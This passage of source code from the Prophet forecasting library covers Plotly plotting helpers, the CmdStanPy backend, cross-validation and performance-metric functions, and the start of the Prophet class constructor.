color=error_color) )) traces.append(go.Scatter( name=name + '_lower', x=fcst['ds'], y=fcst[name + '_lower'], mode=mode, line=go.scatter.Line(width=0, color=error_color), fillcolor=error_color, fill='tonexty' )) if 'cap' in fcst and plot_cap: traces.append(go.Scatter( name='Cap', x=fcst['ds'], y=fcst['cap'], mode='lines', line=go.scatter.Line(color=cap_color, dash='dash', width=line_width), )) if m.logistic_floor and 'floor' in fcst and plot_cap: traces.append(go.Scatter( name='Floor', x=fcst['ds'], y=fcst['floor'], mode='lines', line=go.scatter.Line(color=cap_color, dash='dash', width=line_width), )) xaxis = go.layout.XAxis( type='date', range=range_x) yaxis = go.layout.YAxis(rangemode='normal' if name == 'trend' else 'tozero', title=go.layout.yaxis.Title(text=name), zerolinecolor=zeroline_color) if name in m.component_modes['multiplicative']: yaxis.update(tickformat='%', hoverformat='.2%') return {'traces': traces, 'xaxis': xaxis, 'yaxis': yaxis} def get_seasonality_plotly_props(m, name, uncertainty=True): """Prepares a dictionary for plotting the selected seasonality with Plotly Parameters ---------- m: Prophet model. name: Name of the component to plot. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. Returns ------- A dictionary with Plotly traces, xaxis and yaxis """ prediction_color = '#0072B2' error_color = 'rgba(0, 114, 178, 0.2)' # '#0072B2' with 0.2 opacity line_width = 2 zeroline_color = '#AAA' # Compute seasonality from Jan 1 through a single period. 
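    # The block below builds a synthetic date range spanning exactly one
    # seasonal period, picking the sampling resolution (daily, hourly, or
    # minutely) from the precision of the training timestamps, and then
    # evaluates the fitted seasonal component over that range.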
start = pd.to_datetime('2017-01-01 0000') period = m.seasonalities[name]['period'] end = start + pd.Timedelta(days=period) if (m.history['ds'].dt.hour == 0).all(): # Day Precision plot_points = np.floor(period).astype(int) elif (m.history['ds'].dt.minute == 0).all(): # Hour Precision plot_points = np.floor(period * 24).astype(int) else: # Minute Precision plot_points = np.floor(period * 24 * 60).astype(int) days = pd.to_datetime(np.linspace(start.value, end.value, plot_points, endpoint=False)) df_y = seasonality_plot_df(m, days) seas = m.predict_seasonal_components(df_y) traces = [] traces.append(go.Scatter( name=name, x=df_y['ds'], y=seas[name], mode='lines', line=go.scatter.Line(color=prediction_color, width=line_width) )) if uncertainty and m.uncertainty_samples and (seas[name + '_upper'] != seas[name + '_lower']).any(): traces.append(go.Scatter( name=name + '_upper', x=df_y['ds'], y=seas[name + '_upper'], mode='lines', line=go.scatter.Line(width=0, color=error_color) )) traces.append(go.Scatter( name=name + '_lower', x=df_y['ds'], y=seas[name + '_lower'], mode='lines', line=go.scatter.Line(width=0, color=error_color), fillcolor=error_color, fill='tonexty' )) # Set tick formats (examples are based on 2017-01-06 21:15) if period <= 2: tickformat = '%H:%M' # "21:15" elif period < 7: tickformat = '%A %H:%M' # "Friday 21:15" elif period < 14: tickformat = '%A' # "Friday" else: tickformat = '%B %e' # "January 6" range_margin = (df_y['ds'].max() - df_y['ds'].min()) * 0.05 xaxis = go.layout.XAxis( tickformat=tickformat, type='date', range=[df_y['ds'].min() - range_margin, df_y['ds'].max() + range_margin] ) yaxis = go.layout.YAxis(title=go.layout.yaxis.Title(text=name), zerolinecolor=zeroline_color) if m.seasonalities[name]['mode'] == 'multiplicative': yaxis.update(tickformat='%', hoverformat='.2%') return {'traces': traces, 'xaxis': xaxis, 'yaxis': yaxis} File: python/prophet/models.py # -*- coding: utf-8 -*- # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from __future__ import absolute_import, division, print_function from abc import abstractmethod, ABC from dataclasses import dataclass from typing import Sequence, Tuple from collections import OrderedDict from enum import Enum import importlib_resources import platform import logging logger = logging.getLogger('prophet.models') PLATFORM = "win" if platform.platform().startswith("Win") else "unix" class TrendIndicator(Enum): LINEAR = 0 LOGISTIC = 1 FLAT = 2 @dataclass class ModelInputData: T: int S: int K: int tau: float trend_indicator: int y: Sequence[float] # length T t: Sequence[float] # length T cap: Sequence[float] # length T t_change: Sequence[float] # length S s_a: Sequence[int] # length K s_m: Sequence[int] # length K X: Sequence[Sequence[float]] # shape (T, K) sigmas: Sequence[float] # length K @dataclass class ModelParams: k: float m: float delta: Sequence[float] # length S beta: Sequence[float] # length K sigma_obs: float class IStanBackend(ABC): def __init__(self): self.model = self.load_model() self.stan_fit = None self.newton_fallback = True def set_options(self, **kwargs): """ Specify model options as kwargs. 
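        Unknown option names raise a ValueError.

        For example, to disable the Newton fallback (a sketch; model.stan_backend
        is assumed to be the backend instance attached to a constructed Prophet
        object):

        >>> model.stan_backend.set_options(newton_fallback=False)

        Supported options: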
* newton_fallback [bool]: whether to fallback to Newton if L-BFGS fails """ for k, v in kwargs.items(): if k == 'newton_fallback': self.newton_fallback = v else: raise ValueError(f'Unknown option {k}') @staticmethod @abstractmethod def get_type(): pass @abstractmethod def load_model(self): pass @abstractmethod def fit(self, stan_init, stan_data, **kwargs) -> dict: pass @abstractmethod def sampling(self, stan_init, stan_data, samples, **kwargs) -> dict: pass class CmdStanPyBackend(IStanBackend): CMDSTAN_VERSION = "2.33.1" def __init__(self): import cmdstanpy # this must be set before super.__init__() for load_model to work on Windows local_cmdstan = importlib_resources.files("prophet") / "stan_model" / f"cmdstan-{self.CMDSTAN_VERSION}" if local_cmdstan.exists(): cmdstanpy.set_cmdstan_path(str(local_cmdstan)) super().__init__() @staticmethod def get_type(): return StanBackendEnum.CMDSTANPY.name def load_model(self): import cmdstanpy model_file = importlib_resources.files("prophet") / "stan_model" / "prophet_model.bin" return cmdstanpy.CmdStanModel(exe_file=str(model_file)) def fit(self, stan_init, stan_data, **kwargs): if 'inits' not in kwargs and 'init' in kwargs: stan_init = self.sanitize_custom_inits(stan_init, kwargs['init']) del kwargs['init'] inits_list, data_list = self.prepare_data(stan_init, stan_data) args = dict( data=data_list, inits=inits_list, algorithm='Newton' if data_list['T'] < 100 else 'LBFGS', iter=int(1e4), ) args.update(kwargs) try: self.stan_fit = self.model.optimize(**args) except RuntimeError as e: # Fall back on Newton if not self.newton_fallback or args['algorithm'] == 'Newton': raise e logger.warning('Optimization terminated abnormally. Falling back to Newton.') args['algorithm'] = 'Newton' self.stan_fit = self.model.optimize(**args) params = self.stan_to_dict_numpy( self.stan_fit.column_names, self.stan_fit.optimized_params_np) for par in params: params[par] = params[par].reshape((1, -1)) return params def sampling(self, stan_init, stan_data, samples, **kwargs) -> dict: if 'inits' not in kwargs and 'init' in kwargs: stan_init = self.sanitize_custom_inits(stan_init, kwargs['init']) del kwargs['init'] inits_list, data_list = self.prepare_data(stan_init, stan_data) args = dict( data=data_list, inits=inits_list, ) if 'chains' not in kwargs: kwargs['chains'] = 4 iter_half = samples // 2 kwargs['iter_sampling'] = iter_half if 'iter_warmup' not in kwargs: kwargs['iter_warmup'] = iter_half args.update(kwargs) self.stan_fit = self.model.sample(**args) res = self.stan_fit.draws() (samples, c, columns) = res.shape res = res.reshape((samples * c, columns)) params = self.stan_to_dict_numpy(self.stan_fit.column_names, res) for par in params: s = params[par].shape if s[1] == 1: params[par] = params[par].reshape((s[0],)) if par in ['delta', 'beta'] and len(s) < 2: params[par] = params[par].reshape((-1, 1)) return params @staticmethod def sanitize_custom_inits(default_inits, custom_inits): """Validate that custom inits have the correct type and shape, otherwise use defaults.""" sanitized = {} for param in ['k', 'm', 'sigma_obs']: try: sanitized[param] = float(custom_inits.get(param)) except Exception: sanitized[param] = default_inits[param] for param in ['delta', 'beta']: if default_inits[param].shape == custom_inits[param].shape: sanitized[param] = custom_inits[param] else: sanitized[param] = default_inits[param] return sanitized @staticmethod def prepare_data(init, data) -> Tuple[dict, dict]: """Converts np.ndarrays to lists that can be read by cmdstanpy.""" cmdstanpy_data = { 
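            # Scalar sizes and hyperparameters are passed through unchanged;
            # array-valued fields are converted to plain Python lists below so
            # that cmdstanpy can serialize them.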
'T': data['T'], 'S': data['S'], 'K': data['K'], 'tau': data['tau'], 'trend_indicator': data['trend_indicator'], 'y': data['y'].tolist(), 't': data['t'].tolist(), 'cap': data['cap'].tolist(), 't_change': data['t_change'].tolist(), 's_a': data['s_a'].tolist(), 's_m': data['s_m'].tolist(), 'X': data['X'].to_numpy().tolist(), 'sigmas': data['sigmas'] } cmdstanpy_init = { 'k': init['k'], 'm': init['m'], 'delta': init['delta'].tolist(), 'beta': init['beta'].tolist(), 'sigma_obs': init['sigma_obs'] } return (cmdstanpy_init, cmdstanpy_data) @staticmethod def stan_to_dict_numpy(column_names: Tuple[str, ...], data: 'np.array'): import numpy as np output = OrderedDict() prev = None start = 0 end = 0 two_dims = len(data.shape) > 1 for cname in column_names: parsed = cname.split(".") if "." in cname else cname.split("[") curr = parsed[0] if prev is None: prev = curr if curr != prev: if prev in output: raise RuntimeError( "Found repeated column name" ) if two_dims: output[prev] = np.array(data[:, start:end]) else: output[prev] = np.array(data[start:end]) prev = curr start = end end += 1 if prev in output: raise RuntimeError( "Found repeated column name" ) if two_dims: output[prev] = np.array(data[:, start:end]) else: output[prev] = np.array(data[start:end]) return output class StanBackendEnum(Enum): CMDSTANPY = CmdStanPyBackend @staticmethod def get_backend_class(name: str) -> IStanBackend: try: return StanBackendEnum[name].value except KeyError as e: raise ValueError(f"Unknown stan backend: {name}") from e File: python/prophet/diagnostics.py # -*- coding: utf-8 -*- # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from __future__ import absolute_import, division, print_function import logging from tqdm.auto import tqdm from copy import deepcopy import concurrent.futures import numpy as np import pandas as pd logger = logging.getLogger('prophet') def generate_cutoffs(df, horizon, initial, period): """Generate cutoff dates Parameters ---------- df: pd.DataFrame with historical data. horizon: pd.Timedelta forecast horizon. initial: pd.Timedelta window of the initial forecast period. period: pd.Timedelta simulated forecasts are done with this period. Returns ------- list of pd.Timestamp """ # Last cutoff is 'latest date in data - horizon' date cutoff = df['ds'].max() - horizon if cutoff < df['ds'].min(): raise ValueError('Less data than horizon.') result = [cutoff] while result[-1] >= min(df['ds']) + initial: cutoff -= period # If data does not exist in data range (cutoff, cutoff + horizon] if not (((df['ds'] > cutoff) & (df['ds'] <= cutoff + horizon)).any()): # Next cutoff point is 'last date before cutoff in data - horizon' if cutoff > df['ds'].min(): closest_date = df[df['ds'] <= cutoff].max()['ds'] cutoff = closest_date - horizon # else no data left, leave cutoff as is, it will be dropped. result.append(cutoff) result = result[:-1] if len(result) == 0: raise ValueError( 'Less data than horizon after initial window. ' 'Make horizon or initial shorter.' ) logger.info('Making {} forecasts with cutoffs between {} and {}'.format( len(result), result[-1], result[0] )) return list(reversed(result)) def cross_validation(model, horizon, period=None, initial=None, parallel=None, cutoffs=None, disable_tqdm=False, extra_output_columns=None): """Cross-Validation for time series. Computes forecasts from historical cutoff points, which user can input. 
If not provided, begins from (end - horizon) and works backwards, making cutoffs with a spacing of period until initial is reached. When period is equal to the time interval of the data, this is the technique described in https://robjhyndman.com/hyndsight/tscv/ . Parameters ---------- model: Prophet class object. Fitted Prophet model. horizon: string with pd.Timedelta compatible style, e.g., '5 days', '3 hours', '10 seconds'. period: string with pd.Timedelta compatible style. Simulated forecast will be done at every this period. If not provided, 0.5 * horizon is used. initial: string with pd.Timedelta compatible style. The first training period will include at least this much data. If not provided, 3 * horizon is used. cutoffs: list of pd.Timestamp specifying cutoffs to be used during cross validation. If not provided, they are generated as described above. parallel : {None, 'processes', 'threads', 'dask', object} How to parallelize the forecast computation. By default no parallelism is used. * None : No parallelism. * 'processes' : Parallelize with concurrent.futures.ProcessPoolExectuor. * 'threads' : Parallelize with concurrent.futures.ThreadPoolExecutor. Note that some operations currently hold Python's Global Interpreter Lock, so parallelizing with threads may be slower than training sequentially. * 'dask': Parallelize with Dask. This requires that a dask.distributed Client be created. * object : Any instance with a `.map` method. This method will be called with :func:`single_cutoff_forecast` and a sequence of iterables where each element is the tuple of arguments to pass to :func:`single_cutoff_forecast` .. code-block:: class MyBackend: def map(self, func, *iterables): results = [ func(*args) for args in zip(*iterables) ] return results disable_tqdm: if True it disables the progress bar that would otherwise show up when parallel=None extra_output_columns: A String or List of Strings e.g. 'trend' or ['trend']. Additional columns to 'yhat' and 'ds' to be returned in output. Returns ------- A pd.DataFrame with the forecast, actual value and cutoff. """ if model.history is None: raise Exception('Model has not been fit. Fitting the model provides contextual parameters for cross validation.') df = model.history.copy().reset_index(drop=True) horizon = pd.Timedelta(horizon) predict_columns = ['ds', 'yhat'] if model.uncertainty_samples: predict_columns.extend(['yhat_lower', 'yhat_upper']) if extra_output_columns is not None: if isinstance(extra_output_columns, str): extra_output_columns = [extra_output_columns] predict_columns.extend([c for c in extra_output_columns if c not in predict_columns]) # Identify largest seasonality period period_max = 0. 
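    # The longest configured seasonality (in days) gives a lower bound that is
    # compared against the initial training window below, so we can warn when
    # the window is too short to cover a full seasonal cycle.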
for s in model.seasonalities.values(): period_max = max(period_max, s['period']) seasonality_dt = pd.Timedelta(str(period_max) + ' days') if cutoffs is None: # Set period period = 0.5 * horizon if period is None else pd.Timedelta(period) # Set initial initial = ( max(3 * horizon, seasonality_dt) if initial is None else pd.Timedelta(initial) ) # Compute Cutoffs cutoffs = generate_cutoffs(df, horizon, initial, period) else: # add validation of the cutoff to make sure that the min cutoff is strictly greater than the min date in the history if min(cutoffs) <= df['ds'].min(): raise ValueError("Minimum cutoff value is not strictly greater than min date in history") # max value of cutoffs is <= (end date minus horizon) end_date_minus_horizon = df['ds'].max() - horizon if max(cutoffs) > end_date_minus_horizon: raise ValueError("Maximum cutoff value is greater than end date minus horizon, no value for cross-validation remaining") initial = cutoffs[0] - df['ds'].min() # Check if the initial window # (that is, the amount of time between the start of the history and the first cutoff) # is less than the maximum seasonality period if initial < seasonality_dt: msg = 'Seasonality has period of {} days '.format(period_max) msg += 'which is larger than initial window. ' msg += 'Consider increasing initial.' logger.warning(msg) if parallel: valid = {"threads", "processes", "dask"} if parallel == "threads": pool = concurrent.futures.ThreadPoolExecutor() elif parallel == "processes": pool = concurrent.futures.ProcessPoolExecutor() elif parallel == "dask": try: from dask.distributed import get_client except ImportError as e: raise ImportError("parallel='dask' requires the optional " "dependency dask.") from e pool = get_client() # delay df and model to avoid large objects in task graph. df, model = pool.scatter([df, model]) elif hasattr(parallel, "map"): pool = parallel else: msg = ("'parallel' should be one of {} for an instance with a " "'map' method".format(', '.join(valid))) raise ValueError(msg) iterables = ((df, model, cutoff, horizon, predict_columns) for cutoff in cutoffs) iterables = zip(*iterables) logger.info("Applying in parallel with %s", pool) predicts = pool.map(single_cutoff_forecast, *iterables) if parallel == "dask": # convert Futures to DataFrames predicts = pool.gather(predicts) else: predicts = [ single_cutoff_forecast(df, model, cutoff, horizon, predict_columns) for cutoff in (tqdm(cutoffs) if not disable_tqdm else cutoffs) ] # Combine all predicted pd.DataFrame into one pd.DataFrame return pd.concat(predicts, axis=0).reset_index(drop=True) def single_cutoff_forecast(df, model, cutoff, horizon, predict_columns): """Forecast for single cutoff. Used in cross validation function when evaluating for multiple cutoffs either sequentially or in parallel . Parameters ---------- df: pd.DataFrame. DataFrame with history to be used for single cutoff forecast. model: Prophet model object. cutoff: pd.Timestamp cutoff date. Simulated Forecast will start from this date. horizon: pd.Timedelta forecast horizon. predict_columns: List of strings e.g. ['ds', 'yhat']. Columns with date and forecast to be returned in output. Returns ------- A pd.DataFrame with the forecast, actual value and cutoff. """ # Generate new object with copying fitting options m = prophet_copy(model, cutoff) # Train model history_c = df[df['ds'] <= cutoff] if history_c.shape[0] < 2: raise Exception( 'Less than two datapoints before cutoff. ' 'Increase initial window.' 
) m.fit(history_c, **model.fit_kwargs) # Calculate yhat index_predicted = (df['ds'] > cutoff) & (df['ds'] <= cutoff + horizon) # Get the columns for the future dataframe columns = ['ds'] if m.growth == 'logistic': columns.append('cap') if m.logistic_floor: columns.append('floor') columns.extend(m.extra_regressors.keys()) columns.extend([ props['condition_name'] for props in m.seasonalities.values() if props['condition_name'] is not None]) yhat = m.predict(df[index_predicted][columns]) # Merge yhat(predicts), y(df, original data) and cutoff return pd.concat([ yhat[predict_columns], df[index_predicted][['y']].reset_index(drop=True), pd.DataFrame({'cutoff': [cutoff] * len(yhat)}) ], axis=1) def prophet_copy(m, cutoff=None): """Copy Prophet object Parameters ---------- m: Prophet model. cutoff: pd.Timestamp or None, default None. cuttoff Timestamp for changepoints member variable. changepoints are only retained if 'changepoints <= cutoff' Returns ------- Prophet class object with the same parameter with model variable """ if m.history is None: raise Exception('This is for copying a fitted Prophet object.') if m.specified_changepoints: changepoints = m.changepoints if cutoff is not None: # Filter change points '< cutoff' last_history_date = max(m.history['ds'][m.history['ds'] <= cutoff]) changepoints = changepoints[changepoints < last_history_date] else: changepoints = None # Auto seasonalities are set to False because they are already set in # m.seasonalities. m2 = m.__class__( growth=m.growth, n_changepoints=m.n_changepoints, changepoint_range=m.changepoint_range, changepoints=changepoints, yearly_seasonality=False, weekly_seasonality=False, daily_seasonality=False, holidays=m.holidays, holidays_mode=m.holidays_mode, seasonality_mode=m.seasonality_mode, seasonality_prior_scale=m.seasonality_prior_scale, changepoint_prior_scale=m.changepoint_prior_scale, holidays_prior_scale=m.holidays_prior_scale, mcmc_samples=m.mcmc_samples, interval_width=m.interval_width, uncertainty_samples=m.uncertainty_samples, stan_backend=( m.stan_backend.get_type() if m.stan_backend is not None else None ), ) m2.extra_regressors = deepcopy(m.extra_regressors) m2.seasonalities = deepcopy(m.seasonalities) m2.country_holidays = deepcopy(m.country_holidays) return m2 def performance_metrics(df, metrics=None, rolling_window=0.1, monthly=False): """Compute performance metrics from cross-validation results. Computes a suite of performance metrics on the output of cross-validation. By default the following metrics are included: 'mse': mean squared error 'rmse': root mean squared error 'mae': mean absolute error 'mape': mean absolute percent error 'mdape': median absolute percent error 'smape': symmetric mean absolute percentage error 'coverage': coverage of the upper and lower intervals A subset of these can be specified by passing a list of names as the `metrics` argument. Metrics are calculated over a rolling window of cross validation predictions, after sorting by horizon. Averaging is first done within each value of horizon, and then across horizons as needed to reach the window size. The size of that window (number of simulated forecast points) is determined by the rolling_window argument, which specifies a proportion of simulated forecast points to include in each window. rolling_window=0 will compute it separately for each horizon. The default of rolling_window=0.1 will use 10% of the rows in df in each window. rolling_window=1 will compute the metric across all simulated forecast points. 
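    For example, with 500 rows of cross validation output and
    rolling_window=0.1, each reported value aggregates a window of
    int(0.1 * 500) = 50 forecast points (after sorting by horizon).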
The results are set to the right edge of the window. If rolling_window < 0, then metrics are computed at each datapoint with no averaging (i.e., 'mse' will actually be squared error with no mean). The output is a dataframe containing column 'horizon' along with columns for each of the metrics computed. Parameters ---------- df: The dataframe returned by cross_validation. metrics: A list of performance metrics to compute. If not provided, will use ['mse', 'rmse', 'mae', 'mape', 'mdape', 'smape', 'coverage']. rolling_window: Proportion of data to use in each rolling window for computing the metrics. Should be in [0, 1] to average. monthly: monthly=True will compute horizons as numbers of calendar months from the cutoff date, starting from 0 for the cutoff month. Returns ------- Dataframe with a column for each metric, and column 'horizon' """ valid_metrics = ['mse', 'rmse', 'mae', 'mape', 'mdape', 'smape', 'coverage'] if metrics is None: metrics = valid_metrics if ('yhat_lower' not in df or 'yhat_upper' not in df) and ('coverage' in metrics): metrics.remove('coverage') if len(set(metrics)) != len(metrics): raise ValueError('Input metrics must be a list of unique values') if not set(metrics).issubset(set(valid_metrics)): raise ValueError( 'Valid values for metrics are: {}'.format(valid_metrics) ) df_m = df.copy() if monthly: df_m['horizon'] = df_m['ds'].dt.to_period('M').astype(int) - df_m['cutoff'].dt.to_period('M').astype(int) else: df_m['horizon'] = df_m['ds'] - df_m['cutoff'] df_m.sort_values('horizon', inplace=True) if 'mape' in metrics and df_m['y'].abs().min() < 1e-8: logger.info('Skipping MAPE because y close to 0') metrics.remove('mape') if len(metrics) == 0: return None w = int(rolling_window * df_m.shape[0]) if w >= 0: w = max(w, 1) w = min(w, df_m.shape[0]) # Compute all metrics dfs = {} for metric in metrics: dfs[metric] = eval(metric)(df_m, w) res = dfs[metrics[0]] for i in range(1, len(metrics)): res_m = dfs[metrics[i]] assert np.array_equal(res['horizon'].values, res_m['horizon'].values) res[metrics[i]] = res_m[metrics[i]] return res def rolling_mean_by_h(x, h, w, name): """Compute a rolling mean of x, after first aggregating by h. Right-aligned. Computes a single mean for each unique value of h. Each mean is over at least w samples. Parameters ---------- x: Array. h: Array of horizon for each value in x. w: Integer window size (number of elements). name: Name for metric in result dataframe Returns ------- Dataframe with columns horizon and name, the rolling mean of x. """ # Aggregate over h df = pd.DataFrame({'x': x, 'h': h}) df2 = ( df.groupby('h').agg(['sum', 'count']).reset_index().sort_values('h') ) xs = df2['x']['sum'].values ns = df2['x']['count'].values hs = df2.h.values trailing_i = len(df2) - 1 x_sum = 0 n_sum = 0 # We don't know output size but it is bounded by len(df2) res_x = np.empty(len(df2)) # Start from the right and work backwards for i in range(len(df2) - 1, -1, -1): x_sum += xs[i] n_sum += ns[i] while n_sum >= w: # Include points from the previous horizon. All of them if still # less than w, otherwise weight the mean by the difference excess_n = n_sum - w excess_x = excess_n * xs[i] / ns[i] res_x[trailing_i] = (x_sum - excess_x)/ w x_sum -= xs[trailing_i] n_sum -= ns[trailing_i] trailing_i -= 1 res_h = hs[(trailing_i + 1):] res_x = res_x[(trailing_i + 1):] return pd.DataFrame({'horizon': res_h, name: res_x}) def rolling_median_by_h(x, h, w, name): """Compute a rolling median of x, after first aggregating by h. Right-aligned. 
Computes a single median for each unique value of h. Each median is over at least w samples. For each h where there are fewer than w samples, we take samples from the previous h, moving backwards. (In other words, we ~ assume that the x's are shuffled within each h.) Parameters ---------- x: Array. h: Array of horizon for each value in x. w: Integer window size (number of elements). name: Name for metric in result dataframe Returns ------- Dataframe with columns horizon and name, the rolling median of x. """ # Aggregate over h df = pd.DataFrame({'x': x, 'h': h}) grouped = df.groupby('h') df2 = grouped.size().reset_index().sort_values('h') hs = df2['h'] res_h = [] res_x = [] # Start from the right and work backwards i = len(hs) - 1 while i >= 0: h_i = hs[i] xs = grouped.get_group(h_i).x.tolist() # wrap in array so this works if h is pandas Series with custom index or numpy array next_idx_to_add = np.array(h == h_i).argmax() - 1 while (len(xs) < w) and (next_idx_to_add >= 0): # Include points from the previous horizon. All of them if still # less than w, otherwise just enough to get to w. xs.append(x[next_idx_to_add]) next_idx_to_add -= 1 if len(xs) < w: # Ran out of points before getting enough. break res_h.append(hs[i]) res_x.append(np.median(xs)) i -= 1 res_h.reverse() res_x.reverse() return pd.DataFrame({'horizon': res_h, name: res_x}) # The functions below specify performance metrics for cross-validation results. # Each takes as input the output of cross_validation, and returns the statistic # as a dataframe, given a window size for rolling aggregation. def mse(df, w): """Mean squared error Parameters ---------- df: Cross-validation results dataframe. w: Aggregation window size. Returns ------- Dataframe with columns horizon and mse. """ se = (df['y'] - df['yhat']) ** 2 if w < 0: return pd.DataFrame({'horizon': df['horizon'], 'mse': se}) return rolling_mean_by_h( x=se.values, h=df['horizon'].values, w=w, name='mse' ) def rmse(df, w): """Root mean squared error Parameters ---------- df: Cross-validation results dataframe. w: Aggregation window size. Returns ------- Dataframe with columns horizon and rmse. """ res = mse(df, w) res['mse'] = np.sqrt(res['mse']) res.rename({'mse': 'rmse'}, axis='columns', inplace=True) return res def mae(df, w): """Mean absolute error Parameters ---------- df: Cross-validation results dataframe. w: Aggregation window size. Returns ------- Dataframe with columns horizon and mae. """ ae = np.abs(df['y'] - df['yhat']) if w < 0: return pd.DataFrame({'horizon': df['horizon'], 'mae': ae}) return rolling_mean_by_h( x=ae.values, h=df['horizon'].values, w=w, name='mae' ) def mape(df, w): """Mean absolute percent error Parameters ---------- df: Cross-validation results dataframe. w: Aggregation window size. Returns ------- Dataframe with columns horizon and mape. """ ape = np.abs((df['y'] - df['yhat']) / df['y']) if w < 0: return pd.DataFrame({'horizon': df['horizon'], 'mape': ape}) return rolling_mean_by_h( x=ape.values, h=df['horizon'].values, w=w, name='mape' ) def mdape(df, w): """Median absolute percent error Parameters ---------- df: Cross-validation results dataframe. w: Aggregation window size. Returns ------- Dataframe with columns horizon and mdape. 
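    Notes
    -----
    This helper is normally called through performance_metrics, which adds the
    required 'horizon' column and derives the window size w from its
    rolling_window argument. Unlike 'mape', 'mdape' is not skipped
    automatically when y contains values close to zero.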
""" ape = np.abs((df['y'] - df['yhat']) / df['y']) if w < 0: return pd.DataFrame({'horizon': df['horizon'], 'mdape': ape}) return rolling_median_by_h( x=ape.values, h=df['horizon'], w=w, name='mdape' ) def smape(df, w): """Symmetric mean absolute percentage error based on Chen and Yang (2004) formula Parameters ---------- df: Cross-validation results dataframe. w: Aggregation window size. Returns ------- Dataframe with columns horizon and smape. """ sape = np.abs(df['y'] - df['yhat']) / ((np.abs(df['y']) + np.abs(df['yhat'])) / 2) sape = sape.fillna(0) if w < 0: return pd.DataFrame({'horizon': df['horizon'], 'smape': sape}) return rolling_mean_by_h( x=sape.values, h=df['horizon'].values, w=w, name='smape' ) def coverage(df, w): """Coverage Parameters ---------- df: Cross-validation results dataframe. w: Aggregation window size. Returns ------- Dataframe with columns horizon and coverage. """ is_covered = (df['y'] >= df['yhat_lower']) & (df['y'] <= df['yhat_upper']) if w < 0: return pd.DataFrame({'horizon': df['horizon'], 'coverage': is_covered}) return rolling_mean_by_h( x=is_covered.values, h=df['horizon'].values, w=w, name='coverage' ) File: python/prophet/__init__.py # Copyright (c) 2017-present, Facebook, Inc. # All rights reserved. # # This source code is licensed under the BSD-style license found in the # LICENSE file in the root directory of this source tree. An additional grant # of patent rights can be found in the PATENTS file in the same directory. from prophet.forecaster import Prophet from pathlib import Path about = {} here = Path(__file__).parent.resolve() with open(here / "__version__.py", "r") as f: exec(f.read(), about) __version__ = about["__version__"] File: python/prophet/__version__.py __version__ = "1.1.5" File: python/prophet/forecaster.py # -*- coding: utf-8 -*- # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from __future__ import absolute_import, division, print_function import dataclasses import logging from collections import OrderedDict, defaultdict from copy import deepcopy from datetime import timedelta from typing import Dict, List, Union import numpy as np import pandas as pd from numpy.typing import NDArray from prophet.make_holidays import get_holiday_names, make_holidays_df from prophet.models import StanBackendEnum, ModelInputData, ModelParams, TrendIndicator from prophet.plot import (plot, plot_components) logger = logging.getLogger('prophet') logger.setLevel(logging.INFO) NANOSECONDS_TO_SECONDS = 1000 * 1000 * 1000 class Prophet(object): """Prophet forecaster. Parameters ---------- growth: String 'linear', 'logistic' or 'flat' to specify a linear, logistic or flat trend. changepoints: List of dates at which to include potential changepoints. If not specified, potential changepoints are selected automatically. n_changepoints: Number of potential changepoints to include. Not used if input `changepoints` is supplied. If `changepoints` is not supplied, then n_changepoints potential changepoints are selected uniformly from the first `changepoint_range` proportion of the history. changepoint_range: Proportion of history in which trend changepoints will be estimated. Defaults to 0.8 for the first 80%. Not used if `changepoints` is specified. yearly_seasonality: Fit yearly seasonality. Can be 'auto', True, False, or a number of Fourier terms to generate. weekly_seasonality: Fit weekly seasonality. 
Can be 'auto', True, False, or a number of Fourier terms to generate. daily_seasonality: Fit daily seasonality. Can be 'auto', True, False, or a number of Fourier terms to generate. holidays: pd.DataFrame with columns holiday (string) and ds (date type) and optionally columns lower_window and upper_window which specify a range of days around the date to be included as holidays. lower_window=-2 will include 2 days prior to the date as holidays. Also optionally can have a column prior_scale specifying the prior scale for that holiday. seasonality_mode: 'additive' (default) or 'multiplicative'. seasonality_prior_scale: Parameter modulating the strength of the seasonality model. Larger values allow the model to fit larger seasonal fluctuations, smaller values dampen the seasonality. Can be specified for individual seasonalities using add_seasonality. holidays_prior_scale: Parameter modulating the strength of the holiday components model, unless overridden in the holidays input. changepoint_prior_scale: Parameter modulating the flexibility of the automatic changepoint selection. Large values will allow many changepoints, small values will allow few changepoints. mcmc_samples: Integer, if greater than 0, will do full Bayesian inference with the specified number of MCMC samples. If 0, will do MAP estimation. interval_width: Float, width of the uncertainty intervals provided for the forecast. If mcmc_samples=0, this will be only the uncertainty in the trend using the MAP estimate of the extrapolated generative model. If mcmc.samples>0, this will be integrated over all model parameters, which will include uncertainty in seasonality. uncertainty_samples: Number of simulated draws used to estimate uncertainty intervals. Settings this value to 0 or False will disable uncertainty estimation and speed up the calculation. stan_backend: str as defined in StanBackendEnum default: None - will try to iterate over all available backends and find the working one holidays_mode: 'additive' or 'multiplicative'. Defaults to seasonality_mode. 
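    Examples
    --------
    A minimal sketch, assuming a training dataframe df with columns 'ds' and
    'y' (the 365-day horizon is arbitrary):

    >>> m = Prophet()
    >>> m.fit(df)
    >>> future = m.make_future_dataframe(periods=365)
    >>> forecast = m.predict(future)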
""" def __init__( self, growth='linear', changepoints=None, n_changepoints=25, changepoint_range=0.8, yearly_seasonality='auto', weekly_seasonality='auto', daily_seasonality='auto', holidays=None, seasonality_mode='additive', seasonality_prior_scale=10.0, holidays_prior_scale=10.0, changepoint_prior_scale=0.05, mcmc_samples=0, interval_width=0.80, uncertainty_samples=1000, stan_backend=None, scaling: str = 'absmax', holidays_mode=None, ): self.growth = growth self.changepoints = changepoints if self.changepoints is not None: self.changepoints = pd.Series(pd.to_datetime(self.changepoints), name='ds') self.n_changepoints = len(self.changepoints) self.specified_changepoints = True else: self.n_changepoints = n_changepoints self.specified_changepoints = False self.changepoint_range = changepoint_range self.yearly_seasonality = yearly_seasonality self.weekly_seasonality = weekly_seasonality self.daily_seasonality = daily_seasonality self.holidays = holidays self.seasonality_mode = seasonality_mode self.holidays_mode = holidays_mode if holidays_mode is None: self.holidays_mode = self.seasonality_mode self.seasonality_prior_scale = float(seasonality_prior_scale) self.changepoint_prior_scale = float(changepoint_prior_scale) self.holidays_prior_scale = float(holidays_prior_scale) self.mcmc_samples = 